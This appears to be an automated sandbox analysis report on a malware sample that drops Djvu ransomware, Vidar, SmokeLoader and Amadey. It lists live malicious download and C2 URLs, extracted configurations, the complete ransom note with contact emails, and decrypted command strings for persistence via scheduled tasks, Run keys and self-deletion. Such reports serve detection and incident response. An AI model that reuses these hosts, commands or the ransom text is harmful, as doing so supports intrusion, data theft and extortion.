                Source: http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe02Avira URL Cloud: Label: malware
                Source: http://zexeq.com/raud/get.phpepAvira URL Cloud: Label: malware
                Source: http://45.9.74.80/wall.exeAvira URL Cloud: Label: malware
                Source: http://zexeq.com/files/1/build3.exeruna2cGAvira URL Cloud: Label: malware
                Source: http://as.imgjeoigaa.com/check/?sid=96240&key=deff0eaee8fdc312425fe215c7a4b183Avira URL Cloud: Label: malware
                Source: http://zexeq.com/files/1/build3.exe$runDAvira URL Cloud: Label: malware
                Source: http://zexeq.com/files/1/build3.exerund57Avira URL Cloud: Label: malware
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\build3[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen8
                Source: C:\Users\user\AppData\Local\Temp\oldplayer.exeAvira: detection malicious, Label: HEUR/AGEN.1317762
                Source: C:\Users\user\AppData\Local\Temp\1543.exeAvira: detection malicious, Label: HEUR/AGEN.1357339
                Source: C:\Users\user\AppData\Local\537f7094-d60c-4d6f-ab72-afcba0f739b8\build3.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen8
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeAvira: detection malicious, Label: HEUR/AGEN.1357339
                Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exeAvira: detection malicious, Label: HEUR/AGEN.1317762
                Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen8
                Source: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build3.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen8
                Source: C:\Users\user\AppData\Local\Temp\XandETC.exeAvira: detection malicious, Label: HEUR/AGEN.1329655
                Source: 00000023.00000002.704356813.00000000039E0000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Djvu {"Download URLs": ["http://colisumy.com/dl/build2.exe", "http://zexeq.com/files/1/build3.exe"], "C2 url": "http://zexeq.com/raud/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-vKvLYNOV9o\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0731JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windo
                Source: 00000021.00000002.700947142.0000000001E20000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199235044780", "https://t.me/headlist"], "Botnet": "153ce668f1e21829c936c2b11fa4d869", "Version": "4.4"}
                Source: 00000004.00000002.631913891.0000000001CC0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://otriluyttn.org/", "http://tolilolihul.net/", "http://somatoka51hub.net/", "http://nuljjjnuli.org/", "http://potunulit.org/", "http://hutnilior.net/", "http://bulimu55t.net/", "http://soryytlic4.net/", "http://bukubuka1.net/", "http://novanosa5org.org/", "http://hujukui3.net/", "http://newzelannd66.org/", "http://golilopaster.org/"]}
                Source: 37.0.oldplayer.exe.cf0000.0.unpackMalware Configuration Extractor: Amadey {"C2 url": "5.42.65.80/8bmeVwqx/index.php", "Version": "3.83"}
                Source: file.exeReversingLabs: Detection: 35%
                Source: file.exeVirustotal: Detection: 40%Perma Link
                Source: toobussy.comVirustotal: Detection: 12%Perma Link
                Source: colisumy.comVirustotal: Detection: 23%Perma Link
                Source: astoriaresidency.comVirustotal: Detection: 5%Perma Link
                Source: potunulit.orgVirustotal: Detection: 24%Perma Link
                Source: C:\Users\user\AppData\Local\537f7094-d60c-4d6f-ab72-afcba0f739b8\build2.exeReversingLabs: Detection: 58%
                Source: C:\Users\user\AppData\Local\537f7094-d60c-4d6f-ab72-afcba0f739b8\build3.exeReversingLabs: Detection: 87%
                Source: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build2.exeReversingLabs: Detection: 58%
                Source: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build3.exeReversingLabs: Detection: 87%
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\build2[1].exeReversingLabs: Detection: 58%
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\build3[1].exeReversingLabs: Detection: 87%
                Source: C:\Users\user\AppData\Local\Temp\124D.exeReversingLabs: Detection: 37%
                Source: C:\Users\user\AppData\Local\Temp\1543.exeReversingLabs: Detection: 87%
                Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exeReversingLabs: Detection: 95%
                Source: C:\Users\user\AppData\Local\Temp\3971.exeReversingLabs: Detection: 37%
                Source: C:\Users\user\AppData\Local\Temp\46F.exeReversingLabs: Detection: 37%
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeReversingLabs: Detection: 87%
                Source: C:\Users\user\AppData\Local\Temp\F42F.exeReversingLabs: Detection: 37%
                Source: C:\Users\user\AppData\Local\Temp\XandETC.exeReversingLabs: Detection: 72%
                Source: C:\Users\user\AppData\Local\Temp\aafg31.exeReversingLabs: Detection: 34%
                Source: C:\Users\user\AppData\Local\Temp\oldplayer.exeReversingLabs: Detection: 95%
                Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeReversingLabs: Detection: 87%
                Source: C:\Users\user\AppData\Roaming\uwjrhssReversingLabs: Detection: 35%
                Source: file.exeJoe Sandbox ML: detected
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: 5.42.65.80
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: /8bmeVwqx/index.php
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: 3.83
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: 207aa4515d
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: oneetx.exe
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: SCHTASKS
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: /Create /SC MINUTE /MO 1 /TN
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: /TR "
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: " /F
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: Startup
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: cmd /C RMDIR /s/q
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: rundll32
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: /Delete /TN "
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: Programs
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: %USERPROFILE%
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: \App
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: POST
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: &vs=
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: &sd=
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: &os=
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: &bi=
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: &ar=
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: &pc=
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: &un=
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: &dm=
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: &av=
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: &lv=
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: &og=
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: cred.dll|clip.dll|
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: Main
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: http://
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: https://
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: Plugins/
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: &unit=
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: shell32.dll
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: kernel32.dll
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: GetNativeSystemInfo
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: ProgramData\
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: AVAST Software
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: Avira
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: Kaspersky Lab
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: ESET
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: Panda Security
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: Doctor Web
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: 360TotalSecurity
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: Bitdefender
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: Norton
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: Sophos
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: Comodo
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: WinDefender
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: 0123456789
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: ------
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: ?scr=1
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: .jpg
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: Content-Type: application/x-www-form-urlencoded
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: ComputerName
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: -unicode-
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: VideoID
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: \0000
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: DefaultSettings.XResolution
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: DefaultSettings.YResolution
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: ProductName
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: 2019
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: 2022
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: 2016
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: CurrentBuild
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: echo Y|CACLS "
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: " /P "
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: CACLS "
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: :R" /E
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: :F" /E
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: &&Exit
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: rundll32.exe
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: "taskkill /f /im "
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: " && timeout 1 && del
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: && Exit"
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: " && ren
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: &&
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: Powershell.exe
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: -executionpolicy remotesigned -File "
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: |I
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: :Q
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: l(
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: 8
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: \4
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: ;D
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: pa
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: j9
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: E
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: I5
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: @$
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: -%
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: )
                Source: 37.0.oldplayer.exe.cf0000.0.unpackString decryptor: -E
                Source: C:\Users\user\AppData\Local\Temp\oldplayer.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\A843.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\46F.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\build2[1].exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\uwjrhssJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build2.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\4C9F.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\1543.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\124D.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\F42F.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\6E6C.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\AB42.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\tgjrhssJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\3971.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\9721.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\537f7094-d60c-4d6f-ab72-afcba0f739b8\build2.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,6_2_0040E870
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,6_2_0040EAA0
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,6_2_00410FC0

                Compliance

                barindex
                Source: C:\Users\user\AppData\Local\Temp\9721.exeUnpacked PE file: 6.2.9721.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\46F.exeUnpacked PE file: 13.2.46F.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\F42F.exeUnpacked PE file: 15.2.F42F.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\9721.exeUnpacked PE file: 20.2.9721.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\6E6C.exeUnpacked PE file: 23.2.6E6C.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\46F.exeUnpacked PE file: 25.2.46F.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeUnpacked PE file: 26.2.9721.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeUnpacked PE file: 29.2.9721.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\3971.exeUnpacked PE file: 34.2.3971.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeUnpacked PE file: 39.2.9721.exe.400000.0.unpack
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\AppData\Local\Temp\9721.exeFile created: C:\_readme.txt
                Source: C:\Users\user\AppData\Local\Temp\9721.exeFile created: C:\Users\user\_readme.txt
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49698 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49699 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49702 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 103.233.24.19:443 -> 192.168.2.4:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49729 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 80.66.203.53:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 9721.exe, 9721.exe, 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 124D.exe, 00000007.00000002.637838144.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, 124D.exe, 00000008.00000002.640916155.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 46F.exe, 00000009.00000002.648394809.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, F42F.exe, 0000000B.00000002.651980343.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, 9721.exe, 0000000C.00000002.686813260.0000000003980000.00000040.00001000.00020000.00000000.sdmp, 46F.exe, 0000000D.00000002.659138526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, F42F.exe, 0000000F.00000002.651586722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 9721.exe, 00000013.00000002.656069794.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, 9721.exe, 00000014.00000002.797952336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6E6C.exe, 00000016.00000002.660464369.0000000003920000.00000040.00001000.00020000.00000000.sdmp, 6E6C.exe, 00000017.00000002.661107586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 46F.exe, 00000018.00000002.667734975.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, 46F.exe, 00000019.00000002.798083058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 9721.exe, 0000001A.00000002.707784475.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 9721.exe, 0000001B.00000002.671665065.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, 9721.exe, 0000001D.00000002.686383358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 9721.exe, 00000023.00000002.704356813.00000000039E0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000003.00000000.567619641.00007FF883751000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000003.00000000.567619641.00007FF883751000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: StikyNot.pdb0 source: E3B7.exe, 0000001C.00000002.702958379.00000000047B5000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: E3B7.exe, 0000001C.00000002.702958379.00000000047B5000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 9721.exe, 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, 9721.exe, 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 124D.exe, 00000007.00000002.637838144.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, 124D.exe, 00000008.00000002.640916155.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 46F.exe, 00000009.00000002.648394809.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, F42F.exe, 0000000B.00000002.651980343.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, 9721.exe, 0000000C.00000002.686813260.0000000003980000.00000040.00001000.00020000.00000000.sdmp, 46F.exe, 0000000D.00000002.659138526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, F42F.exe, 0000000F.00000002.651586722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 9721.exe, 00000013.00000002.656069794.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, 9721.exe, 00000014.00000002.797952336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6E6C.exe, 00000016.00000002.660464369.0000000003920000.00000040.00001000.00020000.00000000.sdmp, 6E6C.exe, 00000017.00000002.661107586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 46F.exe, 00000018.00000002.667734975.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, 46F.exe, 00000019.00000002.798083058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 9721.exe, 0000001A.00000002.707784475.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 9721.exe, 0000001B.00000002.671665065.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, 9721.exe, 0000001D.00000002.686383358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 9721.exe, 00000023.00000002.704356813.00000000039E0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: StikyNot.pdb source: E3B7.exe, 0000001C.00000002.702958379.00000000047B5000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: eex.pdb source: explorer.exe, 00000003.00000000.567619641.00007FF883751000.00000020.00000001.01000000.00000007.sdmp

                Spreading

                barindex
                Source: Yara matchFile source: 13.2.46F.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 31.2.3971.exe.39215a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.6E6C.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.3971.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.9721.exe.38f15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.46F.exe.38a15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.2.9721.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.9721.exe.39815a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 25.2.46F.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.2.9721.exe.38f15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 36.2.AB42.exe.38a15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.9721.exe.39815a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.124D.exe.38c15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 26.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPE
